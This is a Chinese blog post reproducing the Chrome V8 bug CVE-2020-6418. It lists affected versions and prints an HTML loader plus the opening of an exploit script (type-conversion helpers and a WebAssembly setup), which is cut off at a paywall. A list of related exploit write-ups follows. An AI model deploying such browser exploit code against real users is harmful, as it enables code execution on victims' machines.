CVE-2020-6418复现

最新推荐文章于 2024-07-16 01:11:37 发布
最新推荐文章于 2024-07-16 01:11:37 发布
阅读量707 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115797342
版权
本文详细介绍了如何复现Chrome浏览器的CVE-2020-6418高危漏洞,通过部署恶意html页面,触发Chrome内置打印机。文章提供漏洞影响版本、复现步骤以及修复建议,包括升级到安全版本。
摘要由CSDN通过智能技术生成

    CVE-2020-6418是2020年2月24日Google公布的一个Chrome浏览器的高危漏洞。复现一下,感受一下

影响版本

Chrome < 80.0.3987.122

漏洞复现

测试的Chrome版本为80.0.3987.87

部署恶意html页面在web服务器,访问恶意html页面触发弹出Chrome内置打印机

  1. html

 

<html lang="en">

<head>

    <meta charset="UTF-8">

    <title>test</title>

    <script type="text/javascript" src="exp.js"></script>

</head>

</html>

 

 

exp.js:

 

 

const MAX_ITERATIONS = 0x10000;

var maxSize = 1020*4;

 

var buf =new ArrayBuffer(16);

var float64 = new Float64Array(buf);

var bigUint64 = new BigUint64Array(buf);

var uint32 = new Uint32Array(buf);

// Floating point to 64-bit unsigned integer

function f2i(f)

{

    float64[0] = f;

    return bigUint64[0];

}

// 64-bit unsigned integer to Floating point

function i2f(i)

{

    bigUint64[0] = i;

    return float64[0];

}

 

function f2half(val)

{

    float64[0]= val;

    let tmp = Array.from(uint32);

    return tmp;

}

 

function half2f(val)

{

    uint32.set(val);

    return float64[0];

}

// 64-bit unsigned integer to hex

function hex(i)

{

    return "0x"+i.toString(16).padStart(16, "0");

}

 

function wasm_func() {

    var wasmImports = {

        env: {

            puts: function puts (index) {

                print(utf8ToString(h, index));

            }

        }

    };

最低0.47元/天 解锁文章
不想当脚本小子的脚本小子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-11651
千寻的博客
09-16 1562
文章目录漏洞介绍漏洞原因影响版本漏洞环境:环境搭建环境测试漏洞检测漏洞复现利用poc摘抄 漏洞介绍 CVE-2020-11651 SaltStack水平权限绕过漏洞 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 漏洞原因 漏洞
CVE-2020-14472
weixin_44932880的博客
01-16 716
CVE-2020-14472 https://github.com/Cossack9989/Vulns/blob/master/IoT/CVE-2020-14472.md 下载解压固件 https://www.draytek.com.tw/ftp/Vigor2960/Firmware 使用ubi ubireader_extract_images Vigor2960_v1.5.0.all #得到ubi文件 ubireader_extract_files file.ubi 漏洞点在/www/cgi-bin
Nacos最新0day漏洞复现
最新发布
qq_55213436的博客
07-16 3341
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
CVE-2020-11896
wk19951125的博客
08-14 768
CVE-2020-11896基础知识Treck TCP/IP漏洞原理将不一致转化为内存破坏参考文献 基础知识 Treck TCP/IP Treck公司一套专用于嵌入式系统的TCP/IP协议 tsPacket结构 struct tsPacket { ttUserPacket pktUserStruct; //数据包分片 ttSharedDataPtr pktSharedDataPtr; // 指向存储处理数据包所需信息的Buffer的指针 struct tsPacket * pk
CVE-2020-25213-wp-filemanager-plugin
ordar123的博客
01-07 657
#!/usr/bin/python3 # -*- encoding: utf-8 -*- # @Time : 2020/11/27 9:41 # @Author : ordar # @File : wp_filemanager_rce.py # @Project : pythonCourse # @Python : 3.7.5 import base64 import threading from collections import OrderedDict from po
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-2551.zip
08-28
CVE-2020-2551复现
CVE-2020-14588.zip(升级补丁)
09-06
Oracle Fusion Middleware中的WebLogic Server的Web Container组件存在安全漏洞。攻击者可利用该漏洞未授权读取、创建、删除或修改数据,影响数据的保密性和完整性。以下产品及版本受到影响:Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.3.0版本,12.2.1.4.0版本,14.1.1.0.0版本。
CVE-2020-13942 (Apache Unomi 远程代码执行漏洞复现
痴人说梦梦中人
11-26 905
一、漏洞描述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月 Unomi 成为Apache 软件基金会项目。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-119
【漏洞通告】V8类型混淆漏洞(CVE-2020-6418)通告
爱国小白帽
03-05 1387
【漏洞通告】V8类型混淆漏洞(CVE-2020-6418)通告 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0013 2020-03-04 TAG: Chrome、Edge、类型混淆、CVE-2020-6418 漏洞危害: 攻击者利用此漏洞,可实现非法访问数据、执行恶意代码。 版本: 1.0 1 漏洞概述 2...
CVE-2020-11651 SaltStack认证绕过
king丶
08-19 517
CVE-2020-11651:SaltStack认证绕过复现 简介 Saltstack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,可以理解为简化版的puppet,它基于python语言实现,结合轻量级消息队列(ZeroMQ)与python第三方模块构建。具备以下特点: 部署简单、方便 支持大部分UNIX/Linux及Windows环境 主从集中化管理 配置简单、功能强大、扩展性强 主控端和被控制端基于证书认证,安全可靠 支持API及自...
CVE-2020-16875: Microsoft Exchange远程代码执行漏洞通告
荒野求生的博客
11-19 216
https://mp.weixin.qq.com/s/-Yo_EH30qJQbRRIk_1MK1g 360CERT三六零CERT9月9日 报告编号:B6-2020-090902 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-09 0x01 漏洞简述 2020年09月09日,360CERT监测发现Microsoft Exchange发布了Exchange 命令执行漏洞的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分...
【PHP】CVE-2020-7066
EC_Carrot的博客
11-03 550
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 照抄参考了Anonymous师傅的文章:https://blog.csdn.net/qq_45521281/article/details/106425266 get_headers()函数 get_headers() 是PHP系统级函数,他返回一个包含有服务器响应一个 HTTP 请求所发送的标头的数组。 如果失败则返回 FALSE 并发出一条 E_WA
CVE-2020-11946 ManageEngine OpManager 命令执行
愛夕夕
12-30 937
修正原始Exp部分内容 成功复现版本 124042 #!/usr/bin/python2 import requests import sys import urllib3 import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class OpManagerExploit(): def __init__(self,url): self.url = url
CVE-2020-16875复现
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后,您需要在合适的环境中执行该代码。请确保您已经具备合适的权限,并且在测试环境中进行操作,以避免对真实系统造成损坏。 3. 执行POC代码后,它将尝试利用CVE-2020-16875漏洞攻击Microsoft Exchange Server。该漏洞允许远程攻击者在受影响的Exchange Server上执行任意代码。 4. 在执行POC代码之前,请确保已经阅读并理解了漏洞的风险和影响。同时,建议您在测试环境中进行演示,以避免对生产环境造成任何损害。 请注意,由于该漏洞可能导致严重的安全问题,建议您在使用POC代码或尝试复现漏洞之前,与您的系统管理员或安全团队进行协商和了解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值